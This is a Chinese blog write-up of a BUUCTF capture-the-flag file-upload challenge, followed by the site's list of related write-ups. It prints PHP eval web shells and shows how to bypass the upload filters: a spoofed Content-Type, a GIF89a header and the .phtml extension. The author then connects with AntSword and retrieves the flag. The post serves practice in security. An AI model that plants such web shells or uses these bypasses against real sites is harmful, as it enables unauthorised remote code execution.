buuctf—[极客大挑战 2019]Upload

最新推荐文章于 2024-03-20 15:12:46 发布
最新推荐文章于 2024-03-20 15:12:46 发布
阅读量2.7k 收藏 1
点赞数 1
分类专栏: BUUCTF 文章标签: 文件上传 漏洞 文件包含
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52620919/article/details/121023303
版权

打开环境是一个上传图片的页面。
在这里插入图片描述
那就应该是文件上传了
传一句话木马试试

<?php eval($_POST['SQNU'])?>

在这里插入图片描述
提示不是图片
然后抓包改一下文件格式
类比DVWA里的中级文件上传漏洞
将Content-Type里面的格式改为image/jpeg
在这里插入图片描述
在这里插入图片描述
但是还没有上传成功
应该是有一些过滤

查找大佬文章
改了一下木马和文件后缀.phtml

GIF89a? <script language="php">eval($_REQUEST[1])</script>

phtml后缀作用

phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析

然后上传成功
哈哈
用蚁剑连一下
在根目录下找到flag
棒!!!

小常吃不下了
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
dvwa上的File Upload全难度
m0_74456293的博客
01-18 213
dvwa上的File Upload全难度
2022 uuctf--- crypto Impossible_RSA
3tefanie丶zhou的博客
10-22 768
【一位好姑娘不喜欢你,一定是你不够好,等到你哪天觉得自己足够好了,姑娘兴许也嫁了人了,某次在路上碰见了你,那时也别伤心,是缘分错了,不是你喜欢错了人,记住,在那位姑娘嫁人之后就别纠缠不清了,把那份喜欢藏好,都放在酒里。每次喝酒的时候,念着点她把未来日子过得好,别想着她什么日子过不好,回心转意来找你,那才是一个男人,真正的喜欢一个姑娘】
BUUCTF/Upload-Labs-Linux
最新发布
weixin_44041994的博客
03-20 915
strrchr()函数作用为查找字符串在另一字符串中最后一次出现的位置,并返回从该位置到字符串结尾的所有字符,本用来返回后缀名,如:webshell.php,则会返回.php,但是如果我们在.php后再加入一个 . ,则该函数只会返回 . ,可以轻松绕过检查。ps:只能是Windows系统,并且只能是php文件。文件的上传过程为:用户上传文件,服务器获取文件,然后保存临时文件,然后使用移动函数(比如php中的move_uploaded_file() ),才会将文件移动到站点的根目录下面。
BUUCTF upload
wwwwyyyrre的博客
03-27 182
果然 用了js前端验证 关掉之后试着上传php php3 php5 phtml文件 发现phtml文件可以上传成功。这里之所以用phtml文件 是因为phtml文件可以被解析 图片马虽然有上传路径但是无法链接成功。发现不能是php文件 把文件后缀改成jpg形式 发现有后端过滤文件中不能包含<?这道题只要上传的不是jpg、png、gif结尾的图片都抓不了包 怀疑用了前端验证。上传php文件 发现不可以 并给显示 只可以上传jpg、png、gif结尾的图片。用蚁剑连接成功 在根目录找到flag。
buuctf-upload
m0_62094846的博客
10-31 716
按照指示上传文件 用burp抓取 直接看到flag,我以为就这么做完了,但是交不上去,再看页面,Look here,可能还是需要木马, 但用上次的方法,改文件格式为php,就不会显示上传成功了 查找发现,也可以上传,phtml文件名 就可以得到成功的返还了 接下来按照原来的方法做,用蚁剑,最后可以在根目录下得到flag ...
BUUCTF WEB Upload
qq_41696858的博客
08-30 289
这题和昨天的Upload1简直一模一样,甚至还简单点? 可以看看这一篇https://blog.csdn.net/qq_41696858/article/details/119986051?spm=1001.2014.3001.5501 同样的phtml过后缀过滤,同样的png过前端过滤,同样的蚁剑链接,唯一的区别是<?和图片格式过滤没做 参考视频链接:https://www.bilibili.com/video/BV1kq4y1K7wS ...
Buuctf [ACTF2020 新生赛]Upload
qq_52718293的博客
06-10 394
先说本题考点吧:php别名绕过 打开是一个灯泡,要我们上传一个文件(文件上传)发现有上传要求 我们可以在前端的html中将下图我标记的白色部分删除即可没有要求 然后我们开始可以试着上传一个php文件,发现上传php文件会被拦截。这种时候我们可以用burpsuite fuzz一下(不会的在文章最后会给大佬的教程) fuzz后发现phtml类型的文件可以上传 文件里我们写一句话木马,和cat flag 上传成功后即可看到 然后我们url/uplo4d/881d111ef425270b34a18ab8c5762
BUUCTFUpload [ACTF2020 新生赛]
金 帛的博客
04-19 695
BUUCTF的WP
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
2019年三诺集团四周年庆典极客摇滚跑活动方案
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
GFG-:极客极客30天挑战
02-17
极客30天挑战2021年1月 30天练​​习问题的Python解决方案: 与同学一起翻阅怪胎。(Array); 第N个自然数; 不能表示为Sum的最小正整数; 从抽屉里拿出“ k”双袜子的最小采摘次数; 螺旋矩阵奇克兰的硬币; 有效...
BUUCTF [极客挑战 2019]Upload
m0_49025459的博客
05-12 4655
这题目是文件上传漏洞 看到这种上传的漏洞,肯定就是上传一句话木马,我们写一个正常的一句话木马先上传试试 <?php phpinfo(); @eval($_POST['shell']); ?> 我们上传之后,提示我们不是image格式,那么我们上传的时候就抓一下包,修改一下上传的格式 Content-Type: image/jpeg 放包 这时候我们发现,文件的后缀不能为php,文件绕过的格式也有很php,php3,php4,php5,phtml....
Buuctf 极客挑战 upload
Dexret的博客
12-07 2512
打开该靶机,为一个上传图片的网站 尝试了一下上传php文件改Content-Type,.htaccess以及ini文件,都不能成功 百度了一下还有一种文件名后缀可以绕过 .phtml文件告诉网络服务器,这些文件是由服务器生成的带有动态内容的html文件,就像浏览器中的.php文件表现一样。 因此,在高效使用中,您应该体验到.phtml与.php文件没有任何区别。 这是一个文件ext,一些人用了一段时间来表示它是PHP生成的HTML。 修改shell.php为shell.phtml,内容为:
Buuctf极客挑战2019upload
m0_64444909的博客
04-07 5134
文章目录一.划重点的知识点二.解题步骤二、使用步骤1.引入库2.读入数据总结 一.划重点的知识点 GIF89a图片头文件欺骗: 一个GIF89a图形文件就是一个根据图形交换格式进行格式化之后的图形。用记事本编写一下内容,然后修改后缀变成图片 GIF89a <head> <meta http-equiv = "refresh" content = "1; url=http://www.***.com/" /> </head> 当单独查看此文件时,会出现G
BUUCTF:[强网杯 2019]Upload
末初的CSDN博客
03-27 3129
参考:https://www.zhaoj.in/read-5873.html 稍微测试了一下,不存在注入或者万能密码登录,先注册登录 先传一句话木马图片上去看看 上传的是一张jpg的图片,传上去之后被改后缀为png,而且可以看到路径和文件名都进行了重命名使用md5值 目录扫描出一个www.tar.gz在网站根目录,使用phpstorm打开,发现是ThinkPHP5框架 而且存在....
BUUCTF-Web:[极客挑战 2019]Upload
m0_56161093的博客
05-29 802
题目 解题过程 1、上传文件 从网页上来看是上传一个图片文件,但我们不知道他的检查上传的文件,所以可以试一试上传各种文件。一般检查文件的地方有:后缀名、content-type、文件头的部分内容。 这里我们先上传一个php文件,不做任何修改。如下图: 结果如下: 2、修改文件后缀名和content-type 将文件名修改为test.phtml,绕过常规php文件后缀检测 将文件类型修改为:image/jpeg 注意:phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 修
buuctf-[ACTF2020 新生赛]Upload(小宇特详解)
小宇的web博客
01-15 2600
buuctf-[ACTF2020 新生赛]Upload(小宇特详解) 这里把鼠标放到小灯泡上,发现小灯泡亮了且有文件上传的地方。 这里先上传一个php文件来查看能否上传 这里只能上传指定类型的。查看源代码。 这里进行了前端验证。 这里尝试一下抓包,修改后缀进行上传。 这里写一个一句话木马。 GIF89a//在文件前加上GIF89a来绕过PHP getimagesize的检查,来绕过文件内容头校验 <script language="php">eval($_POST['shell']);&lt
buuctf 极客挑战2019php
08-24
buuctf 极客挑战2019php是指buuctf举办的一个PHP编程比赛,它是基于阿里云IoT技术平台的创新挑战赛。在该比赛中,参赛者需要利用PHP编写代码解决一系列技术难题。这些问题可能涉及到序列化、反序列化、变量值的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值